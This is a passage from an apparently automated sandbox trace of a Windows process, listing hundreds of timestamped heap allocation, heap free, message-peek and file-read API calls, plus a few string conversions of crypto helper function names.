lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0187.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.572] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0187.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0187.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0187.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0187.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0187.574] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.574] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x1e8f, lpOverlapped=0x0) returned 1 [0187.576] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0187.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0187.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e8f) returned 0x900190 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e8f) returned 0x902028 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0187.577] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.577] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e8f) returned 0x900190 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.578] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.578] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.578] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.578] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e8f) returned 0x900190 [0187.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2678 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0187.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2838 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0187.579] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3d8 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0187.579] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e8f) returned 0x903ec0 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0187.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.580] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0187.580] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.580] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0187.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.581] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0187.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0187.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.581] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0187.581] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0187.581] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0187.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.582] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.582] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.582] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0187.582] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.583] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0187.583] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.584] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.584] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0187.584] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0187.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0187.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0187.585] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0187.585] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0187.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 